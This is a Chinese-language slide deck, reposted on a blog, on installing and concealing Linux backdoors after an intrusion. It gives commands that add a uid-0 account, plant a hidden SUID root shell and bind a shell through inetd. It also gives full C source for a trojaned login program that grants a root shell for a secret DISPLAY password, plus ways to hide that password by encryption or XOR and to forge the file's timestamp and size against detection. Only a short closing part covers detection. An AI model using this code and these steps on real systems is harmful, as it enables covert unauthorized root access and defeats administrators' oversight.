Linux后门技术及实践

Mail: e4gle@whitecell.org
   Page: http://www.whitecell.org
   Copyright: Whitecell Security Systems

概述

  后门简介
  常用后门技术
  后门的检测
  实例讲解:login后门

后门简介

  入侵者完全控制系统后,为方便下次进入
  而采用的一种技术。
  一般通过修改系统配置文件和安装第三方
  后门工具来实现。
  具有隐蔽性,能绕开系统日志,不易被系
  统管理员发现等特点。

常用后门技术

  增加超级用户账号
  破解/嗅探用户密码
  放置SUID Shell
  rhosts + +
  利用系统服务程序
  TCP/UDP/ICMP Shell
  Crontab定时任务
  共享库文件
  工具包rootkit
  可装载内核模块(LKM)

增加超级用户

  # echo "e4gle:x:0:0::/:/bin/sh" >>
  /etc/passwd
  # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
  /etc/shadow
  如果系统不允许uid=0的用户远程登录,
  还需要增加一个普通用户账号。

破解/嗅探用户密码

  获得shadow文件后,用John the Ripper
  工具破解薄弱的用户密码。
  安装sniffit等嗅探工具,监听telnet、ftp等
  端口,收集用户密码。

放置SUID Shell

  # cp /bin/bash /dev/.rootshell
  # chmod u+s /dev/.rootshell
  普通用户在本机运行/dev/.rootshell,即
  可获得一个root权限的shell。

rhosts + +

  # echo "+ +" > /.rhosts
  # rsh -l root victim.com csh -i
  远程可以得到一个rootshell。

利用系统服务程序

  修改/etc/inetd.conf,
  daytime stream tcp nowait /bin/sh sh -I
  用trojan程序替换in.telnetd、in.rexecd等
  inted的服务程序
  重定向login程序

TCP/UDP/ICMP Shell

  BindShell,大部分是基于TCP/UDP协议
  的网络服务程序,在高端口监听,很容易
  被发现。
  Ping Backdoor,通过ICMP包激活后门,
  形成一个Shell通道。
  TCP ACK数据包后门,能够穿越防火
  墙。

Crontab定时任务

  通过Crontab程序调度已安装的后门程序
  定时运行,一般在深夜时段,是系统管理
  员不在线的时间。

共享库文件

  在共享库中嵌入后门函数
  使用后门口令激活Shell,获得权限
  能够躲避系统管理员对二进制文件本身的
  校验

工具包rootkit

  包含一系列系统及后门工具:
  - 清除日志中的登录记录
  - 伪装校验和
  - 替换netstat、ps等网络工具
  - 后门登录程序
  易于安装和使用

可装载内核模块(LKM)

  LKM:Loadable Kernel Modules
  动态的加载,不需要重新编译内核。
  截获系统调用,具有隐藏目录、文件、进
  程、网络连接等强大功能。
  自身隐蔽性好,发现难度较大。
  著名的LKM包有adore和knark。

后门的检测

  以自己的经验,结合特定的工具,手工作
  一些检测。
  使用Tripwire或md5校验来检查系统。
  借助IDS系统,监听到目标机器的可疑网
  络连接。

实例:login后门

  入侵者先把原始的/bin/login备份,再用一
  段程序替换/bin/login。入侵者telnet登录
  进来的时候,通过环境变量或者终端类型
  传递了正确的后门密码,将直接获得一个
  Shell;如果是普通用户登录,将会重定
  向到原始的login文件,来处理正常的登
  录。
  最简单的login后门ulogin.c源代码如下:

实例:login后门

  #include <stdio.h>
  #define PASSWORD "passWORD"
  #define _PATH_LOGIN "/sbin/logins"

  main (argc, argv, envp)
  int argc;
  char **argv, **envp;
  {
           char *display = getenv("DISPLAY");
           if ( display == NULL ) {
                          execve(_PATH_LOGIN, argv, envp);
                          perror(_PATH_LOGIN);
                          exit(1);
           }
           if (!strcmp(display,PASSWORD)) {
                          system("/bin/csh");
                          exit(1);
           }
           execve(_PATH_LOGIN, argv, envp);
           exit(1);
  }

利用后门登录

  首先Telnet服务是打开的,在自己机器上:
  bash$ export DISPLAY=passWORD
  bash$ telnet victim.com
  Trying xxx.xxx.xxx.xxx...
  Connected to victim.com (xxx.xxx.xxx.xxx).
  Escape character is '^]'.
  % _

strings命令

    strings命令能够打印出二进制文件中的可显示
    字符串,用于刚才的ulogin程序:
    bash$ strings ulogin
    /lib/ld-linux.so.2
    ..............
    DISPLAY
    /sbin/logins
    passWORD
    /bin/csh

加密后门密码(1)

  1,采用DES算法,即crypt( )函数,编写gen.c程序:
  #include <unistd.h>
  main(int argc, char *argv[])
  {
      if (argc != 3) {
        printf("usage: %s <password> <salt>/n", argv[0]);
        exit(1);
     }
      printf("%s/n", crypt(argv[1], argv[2]));
  }

加密后门密码(1)

  2、编译为gen,执行./gen hack ui,得到的shadow结
  果为UiVqMWvDrIQjA。
  3、修改后门源程序ulogin.c:
  -- 以密文形式的密码代替ulogin.c中define的宏
PASSWORD值。
  -- 如果后门密码正确,直接给出Shell:
  if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
  {
       system(SHELL);
       exit(1);
  }
  用strings命令只能看到加密过的密码。

加密后门密码(2)

  采用异或(XOR)算法
  以十六进制方式表示字符串,以达到non-
  printable的效果
  1、编码程序encode.c如下:

加密后门密码(2)

  char magic[]="/x71/x67/x6d/x7a/x65/x61/x7a";
  char *de(char *str,char *key)
  {
  int i=0,j=0,len;
  len=strlen(key);
  while(str[i] != '/0') {
  str[i]^=key[j];
  j++;
  if(j==len) j=0;
  i++;
  }
  return str;
  }
  void display(char *str)
  {
  int i;
  for(i=0;i<strlen(str);i++) printf("//x%x",str[i]);
  printf("/n");
  }
  main()
  {
  char gets[100], *ptr;
  ptr=gets;
  scanf ("%s",ptr);
  de(ptr,magic);display(ptr);
  }

加密后门密码(2)

  2、编译程序encode,依次执行得到关键字符
  串与magic串异或后的结果,例如原始login的文
  件名/sbin/xlogin,经过异或后为:
  /x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x13/xb
  3、在后门源代码中这样定义:
  Char
  login[]="/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x
  13/xb";
  然后插入异或函数char *de()结合同一magic
  串,就能判断出正确的后门密码。
  用strings命令看不到密码、路径等字符串了。

最后的修饰(1)

  使后门程序ulogin的strings输出类似于正
  常login的strings输出,做法为:
  在ulogin.c代码中增加一个字符串数组
  char strings[] ="";,在引号中填入正常
  login程序的strings输出结果。
  以假乱真,增加迷惑性。

最后的修饰(2)

  调整后门程序的文件日期、大小等属性:
  1、日期
  # ls -l /sbin/xlogin
  -r-sr-xr-x root root 19300 Feb 11 1998
  /sbin/xlogin
  # touch -t 199802110000 ulogin
  # _

最后的修饰(2)

  2、调整大小
  # ls -l ulogin /sbin/xlogin
  -r-sr-xr-x root root 7542 Feb 11 1998 ulogin
  -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
  # bc
  19300-7542
  11758
  # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
  1+0 records in
  1+0 records out
  11758 bytes transferred in 0.000379 secs (31016746
  bytes/sec)
  # cat /tmp/t >> ulogin

Login后门的检测

  使用命令md5sum对现有/bin/login文件作
  校验,与以前的值作比较。
  使用Red Hat Linux的RPM校验:
  # rpm -V util-linux
  在入侵者已经利用后门登录的情况下,
  who是看不到用户的,查看系统进程,查
  找login -h xxx.xxx.xxx.xxx的字样。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值